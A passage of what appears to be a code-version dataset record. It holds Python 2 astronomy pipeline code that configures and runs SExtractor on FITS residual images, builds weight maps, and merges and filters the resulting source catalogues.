master residuals\n-> Could not finish SExtracting master residual\"\"\"\n )\n\n\ndef sextractor(location):\n \"\"\"\n runs SExtractor on all residual images\n \"\"\"\n x = 0\n sources = location + '/sources'\n residuals = location + '/residuals'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n length = len(residuals) + 1\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n images = glob.glob(residuals + '/*_residual_.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n 
config.close()\n print('-> Converting all residual masks into weight maps...\\n')\n for r in tqdm(images):\n weight = weight_map(r)\n hdu = fits.open(r, mode='update')\n data = hdu[0].data\n hdr = hdu[0].header\n try:\n if hdr['WEIGHT'] == 'N':\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n except KeyError:\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n hdu.close()\n try:\n if fits.getval(r, 'NORM') == 'N':\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n except KeyError:\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n print('\\n-> SExtracting residual images...')\n for i in images:\n name = i[length:-5]\n data_name = location + '/data/' + name.replace('residual_', ''\n ) + '.fits'\n FWHM = psf.fwhm(data_name)\n im_hdu = fits.open(data_name)\n im_header = im_hdu[0].header\n saturate = im_header['SATURATE']\n pixscale = im_header['PIXSCALE']\n im_hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-9\n ] + '.psf' + '\\n'\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % i + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (i, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(i) * -1, header=fits.\n getheader(i))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits' % location)\n os.system(\n 'sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s' %\n (location, sources, name, config_loc))\n append_negative_sources(i)\n os.remove('%s/residuals/temp.fits' % location)\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' 
% per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'sources' directory\\n\" %\n len(images))\n print('-> Filtering source catalogs...\\n')\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_sim(image):\n location = image.split('/')[:-2]\n location = '/'.join(location)\n sources = location + '/sources'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting fake image...')\n name = image.split('/')[-1]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-5\n ] + '.psf' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (image, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(image) * -1, header=fits.\n getheader(image))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits')\n os.system('sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s' %\n (location, sources, name, config_loc))\n os.remove('%s/residuals/temp.fits' % location)\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_psf(location):\n x = 0\n psf_loc = location + '/psf'\n data = location + '/data'\n templates = location + '/templates'\n check = os.path.exists(psf_loc)\n if check == False:\n os.system('mkdir %s' % psf_loc)\n temps = glob.glob(templates + '/*.fits')\n images = glob.glob(data + '/*_A_.fits')\n for t in temps:\n images.append(t)\n cats = glob.glob(location + '/psf/*.cat')\n images_names = [i.split('/')[-1][:-5] for i in images]\n cats_names = [c.split('/')[-1][:-4] for c in cats]\n imageCats = [im for im in images_names if im not in cats_names]\n images = []\n if temps == []:\n temps.append('')\n for imcats in imageCats:\n if imcats == temps[0].split('/')[-1][:-5]:\n images.append(temps[0])\n else:\n images.append(location + '/data/' + imcats + '.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[19\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalogs...')\n if len(temps) == 1:\n for i in images:\n name = i.split('/')[-1][:-5]\n hdu = fits.open(i)\n hdr = hdu[0].header\n pixscale = hdr['PIXSCALE']\n hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = ('CATALOG_NAME' + ' ' + psf_loc + '/' + name +\n '.cat' + '\\n')\n data[44] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n with open(config_loc, 'w') as 
config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (i, config_loc))\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'psf' directory\\n\" %\n len(images))\n else:\n print('\\n-> Error: Problem with number of template images\\n')\n sys.exit()\n return images\n\n\ndef sextractor_psf_sim(location, image):\n psf_loc = location + '/psf'\n data = location + '/data'\n check = os.path.exists(psf_loc)\n length = len(data) + 1\n if check == False:\n os.system('mkdir %s' % psf_loc)\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalog of fake image...')\n name = image[length:-5]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6\n ] = 'CATALOG_NAME' + ' ' + psf_loc + '/' + name + '.cat' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (image, config_loc))\n\n\ndef weight_map(image):\n hdu = fits.open(image)\n hduMask = hdu[1].data\n zeroMask = np.zeros(hduMask.shape)\n weightMap = np.logical_not(np.logical_or(hduMask, zeroMask)).astype(float)\n hdu.close()\n return weightMap\n\n\ndef src_join(location):\n source_loc = location + '/sources'\n temp_source_loc = source_loc + '/temp'\n temp_source_files = glob.glob(temp_source_loc + '/*.txt')\n image_names = filters.get_image_names(location)\n for file in temp_source_files:\n with open(file, 'r') as fl:\n data = fl.readlines()\n data = [str(file.replace('txt', 'fits')[len(source_loc) + 6:]) + '\\n'\n ] + data\n data.append('\\n\\n\\n')\n with open(source_loc + '/sources.txt', 'a+') as s:\n if data[0] not in image_names:\n s.writelines(data)\n os.remove(file)\n try:\n os.rmdir(temp_source_loc)\n except:\n print(\"-> Error: Problem removing temp directory in '/sources'\")\n\n\ndef filter_sources(location, mask_sources=False):\n print('\\n-> Filtering out non PSF-like sources...')\n filters.spread_model_filter(location)\n print('-> Filtering out diveted detections...')\n images = glob.glob(location + '/data/*_A_.fits')\n for i in images:\n indices = filters.divot(i)\n filters.update_filtered_sources(location, indices)\n residuals = glob.glob('%s/residuals/*_residual_.fits' % location)\n if mask_sources == True:\n for r in residuals:\n filters.mask_sources_image(r)\n\n\ndef MR_filter_sources(location):\n with open('%s/sources/MR_sources.txt' % location, 'r') as MR_src:\n MR_lines = MR_src.readlines()\n MR_lines.insert(0, 'MR.fits\\n')\n with open('%s/sources/MR_sources.txt' % location, 'w+') as MR_src:\n for line in MR_lines:\n MR_src.write(line)\n MR_loc = '%s/residuals/MR.fits' % location\n print('\\n-> Filtering out non PSF-like sources in master residual...')\n filters.spread_model_filter(location, MR=True)\n print('-> Filtering out diveted detections in master residual...')\n indices = filters.divot(MR_loc, MR=True)\n filters.update_filtered_sources(location, indices, MR=True)\n filters.write_total_sources(location)\n\n\ndef append_negative_sources(residual, MR=False):\n location = 
residual.split('/')[:-2]\n location = '/'.join(location)\n name = residual.split('/')[-1]\n name = name.replace('.fits', '')\n if MR == True:\n with open('%s/sources/%s_sources_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/%s_sources.txt' % (location, name), 'a'\n ) as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/%s_sources_2.txt' % (location, name))\n else:\n with open('%s/sources/temp/%s_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/temp/%s.txt' % (location, name), 'a') as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/temp/%s_2.txt' % (location, name))\n",
"step-4": "<mask token>\nimport os\nimport glob\nimport initialize\nimport psf\nfrom astropy.io import fits\nimport filters\nimport numpy as np\nimport sys\nimport MR\nfrom tqdm import tqdm\n\n\ndef sextractor_MR(location, MR_method='swarp', use_config_file=True):\n \"\"\"\n runs SExtractor on master residual\n \"\"\"\n check_MR = glob.glob('%s/residuals/MR.fits' % location)\n if check_MR == []:\n print('-> Master residual does not exist, creating it first...')\n if use_config_file == True:\n MR_method = initialize.get_config_value('MR_method')\n MR.MR(location, MR_method)\n master_res = glob.glob('%s/residuals/MR.fits' % location)\n temp = glob.glob('%s/templates/*.fits' % location)\n if len(master_res) == 1:\n if len(temp) == 1:\n MR = master_res[0]\n template = temp[0]\n temp_name = template.split('/')[-1]\n temp_name = temp_name[:-5]\n MR_hdu = fits.open(MR)\n MR_header = MR_hdu[0].header\n saturate = MR_header['SATURATE']\n temp_hdr = fits.getheader(template)\n pixscale = temp_hdr['PIXSCALE']\n MR_hdu.close()\n FWHM = psf.fwhm_template(template)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20] = ('FILTER_NAME' + ' ' + location +\n '/configs/default.conv' + '\\n')\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting master residual...')\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = ('PSF_NAME' + ' ' + location + '/psf/' +\n temp_name + '.psf' + '\\n')\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % MR + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/sources/MR_sources.txt -c %s' %\n (MR, location, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(MR) * -1, header=\n fits.getheader(MR))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(MR, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/MR_neg.fits' % location)\n os.system(\n 'sextractor %s/residuals/MR_neg.fits[0]> %s/sources/MR_sources_2.txt -c %s'\n % (location, location, config_loc))\n append_negative_sources(MR, MR=True)\n MR_filter_sources(location)\n else:\n print(\n \"\"\"-> Error: Problem with number of template images\n-> Could not finish SExtracting master residual\"\"\"\n )\n else:\n print(\n \"\"\"-> Error: Problem with number of master residuals\n-> Could not finish SExtracting master residual\"\"\"\n )\n\n\ndef sextractor(location):\n \"\"\"\n runs SExtractor on all residual images\n \"\"\"\n x = 0\n sources = location + '/sources'\n residuals = location + '/residuals'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n length = len(residuals) + 1\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n images = glob.glob(residuals + '/*_residual_.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + 
'\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('-> Converting all residual masks into weight maps...\\n')\n for r in tqdm(images):\n weight = weight_map(r)\n hdu = fits.open(r, mode='update')\n data = hdu[0].data\n hdr = hdu[0].header\n try:\n if hdr['WEIGHT'] == 'N':\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n except KeyError:\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n hdu.close()\n try:\n if fits.getval(r, 'NORM') == 'N':\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n except KeyError:\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n print('\\n-> SExtracting residual images...')\n for i in images:\n name = i[length:-5]\n data_name = location + '/data/' + name.replace('residual_', ''\n ) + '.fits'\n FWHM = psf.fwhm(data_name)\n im_hdu = fits.open(data_name)\n im_header = im_hdu[0].header\n saturate = im_header['SATURATE']\n pixscale = im_header['PIXSCALE']\n im_hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-9\n ] + '.psf' + '\\n'\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % i + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (i, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(i) * -1, header=fits.\n getheader(i))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits' % location)\n os.system(\n 'sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s' %\n (location, sources, name, config_loc))\n append_negative_sources(i)\n os.remove('%s/residuals/temp.fits' % location)\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' 
% per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'sources' directory\\n\" %\n len(images))\n print('-> Filtering source catalogs...\\n')\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_sim(image):\n location = image.split('/')[:-2]\n location = '/'.join(location)\n sources = location + '/sources'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting fake image...')\n name = image.split('/')[-1]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-5\n ] + '.psf' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (image, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(image) * -1, header=fits.\n getheader(image))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits')\n os.system('sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s' %\n (location, sources, name, config_loc))\n os.remove('%s/residuals/temp.fits' % location)\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_psf(location):\n x = 0\n psf_loc = location + '/psf'\n data = location + '/data'\n templates = location + '/templates'\n check = os.path.exists(psf_loc)\n if check == False:\n os.system('mkdir %s' % psf_loc)\n temps = glob.glob(templates + '/*.fits')\n images = glob.glob(data + '/*_A_.fits')\n for t in temps:\n images.append(t)\n cats = glob.glob(location + '/psf/*.cat')\n images_names = [i.split('/')[-1][:-5] for i in images]\n cats_names = [c.split('/')[-1][:-4] for c in cats]\n imageCats = [im for im in images_names if im not in cats_names]\n images = []\n if temps == []:\n temps.append('')\n for imcats in imageCats:\n if imcats == temps[0].split('/')[-1][:-5]:\n images.append(temps[0])\n else:\n images.append(location + '/data/' + imcats + '.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[19\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalogs...')\n if len(temps) == 1:\n for i in images:\n name = i.split('/')[-1][:-5]\n hdu = fits.open(i)\n hdr = hdu[0].header\n pixscale = hdr['PIXSCALE']\n hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = ('CATALOG_NAME' + ' ' + psf_loc + '/' + name +\n '.cat' + '\\n')\n data[44] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n with open(config_loc, 'w') as 
config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (i, config_loc))\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'psf' directory\\n\" %\n len(images))\n else:\n print('\\n-> Error: Problem with number of template images\\n')\n sys.exit()\n return images\n\n\ndef sextractor_psf_sim(location, image):\n psf_loc = location + '/psf'\n data = location + '/data'\n check = os.path.exists(psf_loc)\n length = len(data) + 1\n if check == False:\n os.system('mkdir %s' % psf_loc)\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalog of fake image...')\n name = image[length:-5]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6\n ] = 'CATALOG_NAME' + ' ' + psf_loc + '/' + name + '.cat' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (image, config_loc))\n\n\ndef weight_map(image):\n hdu = fits.open(image)\n hduMask = hdu[1].data\n zeroMask = np.zeros(hduMask.shape)\n weightMap = np.logical_not(np.logical_or(hduMask, zeroMask)).astype(float)\n hdu.close()\n return weightMap\n\n\ndef src_join(location):\n source_loc = location + '/sources'\n temp_source_loc = source_loc + '/temp'\n temp_source_files = glob.glob(temp_source_loc + '/*.txt')\n image_names = filters.get_image_names(location)\n for file in temp_source_files:\n with open(file, 'r') as fl:\n data = fl.readlines()\n data = [str(file.replace('txt', 'fits')[len(source_loc) + 6:]) + '\\n'\n ] + data\n data.append('\\n\\n\\n')\n with open(source_loc + '/sources.txt', 'a+') as s:\n if data[0] not in image_names:\n s.writelines(data)\n os.remove(file)\n try:\n os.rmdir(temp_source_loc)\n except:\n print(\"-> Error: Problem removing temp directory in '/sources'\")\n\n\ndef filter_sources(location, mask_sources=False):\n print('\\n-> Filtering out non PSF-like sources...')\n filters.spread_model_filter(location)\n print('-> Filtering out diveted detections...')\n images = glob.glob(location + '/data/*_A_.fits')\n for i in images:\n indices = filters.divot(i)\n filters.update_filtered_sources(location, indices)\n residuals = glob.glob('%s/residuals/*_residual_.fits' % location)\n if mask_sources == True:\n for r in residuals:\n filters.mask_sources_image(r)\n\n\ndef MR_filter_sources(location):\n with open('%s/sources/MR_sources.txt' % location, 'r') as MR_src:\n MR_lines = MR_src.readlines()\n MR_lines.insert(0, 'MR.fits\\n')\n with open('%s/sources/MR_sources.txt' % location, 'w+') as MR_src:\n for line in MR_lines:\n MR_src.write(line)\n MR_loc = '%s/residuals/MR.fits' % location\n print('\\n-> Filtering out non PSF-like sources in master residual...')\n filters.spread_model_filter(location, MR=True)\n print('-> Filtering out diveted detections in master residual...')\n indices = filters.divot(MR_loc, MR=True)\n filters.update_filtered_sources(location, indices, MR=True)\n filters.write_total_sources(location)\n\n\ndef append_negative_sources(residual, MR=False):\n location = 
residual.split('/')[:-2]\n location = '/'.join(location)\n name = residual.split('/')[-1]\n name = name.replace('.fits', '')\n if MR == True:\n with open('%s/sources/%s_sources_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/%s_sources.txt' % (location, name), 'a'\n ) as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/%s_sources_2.txt' % (location, name))\n else:\n with open('%s/sources/temp/%s_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/temp/%s.txt' % (location, name), 'a') as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/temp/%s_2.txt' % (location, name))\n",
"step-5": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 4 13:04:32 2018\n\n@author: andrew\n\"\"\"\n\nimport os\nimport glob\nimport initialize\nimport psf\nfrom astropy.io import fits\nimport filters\nimport numpy as np\nimport sys\nimport MR\nfrom tqdm import tqdm\n\ndef sextractor_MR(location, MR_method='swarp', use_config_file=True):\n '''\n runs SExtractor on master residual\n '''\n check_MR = glob.glob(\"%s/residuals/MR.fits\" % (location))\n if check_MR == []:\n print(\"-> Master residual does not exist, creating it first...\")\n if use_config_file == True:\n MR_method = initialize.get_config_value('MR_method')\n MR.MR(location, MR_method)\n master_res = glob.glob(\"%s/residuals/MR.fits\" % (location))\n temp = glob.glob(\"%s/templates/*.fits\" % (location))\n if len(master_res) == 1:\n if len(temp) == 1:\n MR = master_res[0]\n template = temp[0]\n temp_name = template.split('/')[-1]\n temp_name = temp_name[:-5]\n MR_hdu = fits.open(MR)\n MR_header = MR_hdu[0].header\n saturate = MR_header['SATURATE']\n temp_hdr = fits.getheader(template)\n pixscale = temp_hdr['PIXSCALE']\n MR_hdu.close()\n FWHM = psf.fwhm_template(template)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = \"PARAMETERS_NAME\" + \" \" + location + \"/configs/default.param\" + \"\\n\"\n data[20] = \"FILTER_NAME\" + \" \" + location + \"/configs/default.conv\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print(\"\\n-> SExtracting master residual...\")\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = \"SATUR_LEVEL\" + \" \" + str(saturate) + \"\\n\"\n data[62] = \"SEEING_FWHM\" + \" \" + str(FWHM) + \"\\n\"\n data[106] = \"PSF_NAME\" + \" \" + location + \"/psf/\" + temp_name + \".psf\" + \"\\n\"\n data[58] = \"PIXEL_SCALE\" + \" \" + str(pixscale) + \"\\n\"\n data[32] = \"WEIGHT_IMAGE\" + \" \" + \"%s[1]\" % (MR) + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system(\"sextractor %s[0]> %s/sources/MR_sources.txt -c %s\" % (MR, location, config_loc))\n temp_hdu_data = fits.PrimaryHDU((fits.getdata(MR))*-1, header=fits.getheader(MR))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(MR, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto(\"%s/residuals/MR_neg.fits\" % (location))\n os.system(\"sextractor %s/residuals/MR_neg.fits[0]> %s/sources/MR_sources_2.txt -c %s\" % (location, location, config_loc))\n append_negative_sources(MR, MR=True)\n MR_filter_sources(location)\n else:\n print(\"-> Error: Problem with number of template images\\n-> Could not finish SExtracting master residual\")\n else:\n print(\"-> Error: Problem with number of master residuals\\n-> Could not finish SExtracting master residual\")\n\ndef sextractor(location):\n '''\n runs SExtractor on all residual images\n '''\n x = 0\n sources = location + \"/sources\"\n residuals = location + \"/residuals\"\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n length = len(residuals) + 1\n if check == False:\n os.system(\"mkdir %s\" % (sources))\n os.system(\"mkdir %s/temp\" % (sources))\n else:\n if check_temp == False:\n os.system(\"mkdir %s/temp\" % (sources))\n images = glob.glob(residuals + \"/*_residual_.fits\")\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with 
open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = \"PARAMETERS_NAME\" + \" \" + location + \"/configs/default.param\" + \"\\n\"\n data[20] = \"FILTER_NAME\" + \" \" + location + \"/configs/default.conv\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print(\"-> Converting all residual masks into weight maps...\\n\")\n for r in tqdm(images):\n weight = weight_map(r)\n hdu = fits.open(r, mode='update')\n data = hdu[0].data\n hdr = hdu[0].header\n try:\n if hdr['WEIGHT'] == 'N':\n hdr.set('WEIGHT','Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n except KeyError:\n hdr.set('WEIGHT','Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n hdu.close()\n try:\n if fits.getval(r, 'NORM') == 'N':\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n except KeyError:\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n print(\"\\n-> SExtracting residual images...\")\n for i in images:\n name = i[length:-5]\n data_name = location + '/data/' + name.replace('residual_','') + '.fits'\n FWHM = psf.fwhm(data_name)\n im_hdu = fits.open(data_name)\n im_header = im_hdu[0].header\n saturate = im_header['SATURATE']\n pixscale = im_header['PIXSCALE']\n im_hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = \"SATUR_LEVEL\" + \" \" + str(saturate) + \"\\n\"\n data[62] = \"SEEING_FWHM\" + \" \" + str(FWHM) + \"\\n\"\n data[106] = \"PSF_NAME\" + \" \" + location + \"/psf/\" + name[:-9] + \".psf\" + \"\\n\"\n data[58] = \"PIXEL_SCALE\" + \" \" + str(pixscale) + \"\\n\"\n data[32] = \"WEIGHT_IMAGE\" + \" \" + \"%s[1]\" % (i) + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system(\"sextractor %s[0]> %s/temp/%s.txt -c %s\" % (i, sources, name, config_loc))\n 